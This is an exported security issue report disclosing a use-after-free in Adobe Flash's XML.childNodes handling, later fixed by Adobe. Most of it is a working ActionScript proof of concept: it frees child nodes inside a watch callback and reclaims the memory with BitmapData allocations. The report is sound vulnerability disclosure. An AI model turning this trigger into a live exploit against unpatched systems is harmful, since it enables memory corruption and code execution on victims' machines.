search

AN-Master / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-free in XML.childNodes #365

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago 
If a watch is set on the childNodes object of an XML object, and then the XML 
object is manipulated in a way that causes its child nodes to be enumerated, 
the watch will trigger. If the function in the watch deletes all the child 
nodes, the buffer containing the nodes will be deleted, even though the 
original function will still access it when it unwinds. This can lead to a 
childnodes array in ActionScript containing pointers that can be specified by 
an attacker. A minimal POC is as follows:

var doc:XML = new XML(); 
var rootNode:XMLNode = doc.createElement("rootNode");  
var oldest:XMLNode = doc.createElement("oldest"); 
var middle:XMLNode = doc.createElement("middle"); 
var youngest:XMLNode = doc.createElement("youngest"); 
var youngest1:XMLNode = doc.createElement("youngest1"); 
var youngest2:XMLNode = doc.createElement("youngest2"); 
var youngest3:XMLNode = doc.createElement("youngest3"); 

// add the rootNode as the root of the XML document tree 
doc.appendChild(rootNode); 

// add each of the child nodes as children of rootNode 
rootNode.appendChild(oldest); 
rootNode.appendChild(middle); 
rootNode.appendChild(youngest1);
rootNode.appendChild(youngest2);
rootNode.appendChild(youngest3);

// create an array and use rootNode to populate it 
var firstArray:Array = rootNode.childNodes; 
trace (firstArray.length);

firstArray[0] = "test";
firstArray.watch("length", f);
rootNode.appendChild(youngest);

function f(a, b){

    trace("in f " + a + " " + b + " " + c);
    if(b == 1){
    firstArray.unwatch("length");
    middle.removeNode();
    oldest.removeNode();
    youngest1.removeNode();
    youngest2.removeNode();
    youngest3.removeNode();
    youngest.removeNode();
    }

    for(var i = 0; i < 100; i++){
        var b = new flash.display.BitmapData(100, 1000, true, 1000);
        var c = "aaaaaaaaaaaaa";
    }

        trace("end length " + rootNode.childNodes.length);  
    }

A sample fla and swf are also attached. 

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 5 May 2015 at 12:01

Attachments:

GoogleCodeExporter commented 8 years ago 
This is PSIRT-3653

Original comment by natashe...@google.com on 5 May 2015 at 9:58

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:41

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:42

GoogleCodeExporter commented 8 years ago 
Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html

Original comment by natashe...@google.com on 18 Aug 2015 at 7:22